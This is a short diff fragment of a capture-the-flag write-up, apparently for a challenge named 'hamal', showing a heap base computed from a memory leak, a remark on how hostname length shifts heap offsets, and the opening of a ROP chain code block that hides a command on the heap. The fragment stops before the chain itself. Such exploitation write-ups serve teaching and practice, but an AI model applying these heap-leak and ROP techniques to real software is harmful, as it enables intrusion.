gfelber/website/writeups/ctrl_space_hamal.md

 HEAP = u64(leak[0x10:0x18]) - 0x35f20
 ```

+Note: a longer hostname e.g. `127.000.00.1:8080` will take up more heap memory than `127.0.0.1:8080` slightly changing the offset.

-Now we just have to write our ROP Chain, because we have a lot of control over registers and HEAP leak it is rather straight forward to find gadgets:
+Now we just have to write our ROP Chain, because we have a lot of control over registers and a HEAP leak it is rather straight forward to find gadgets:

 ```python
 # hide a command on the heap on a known address due to leak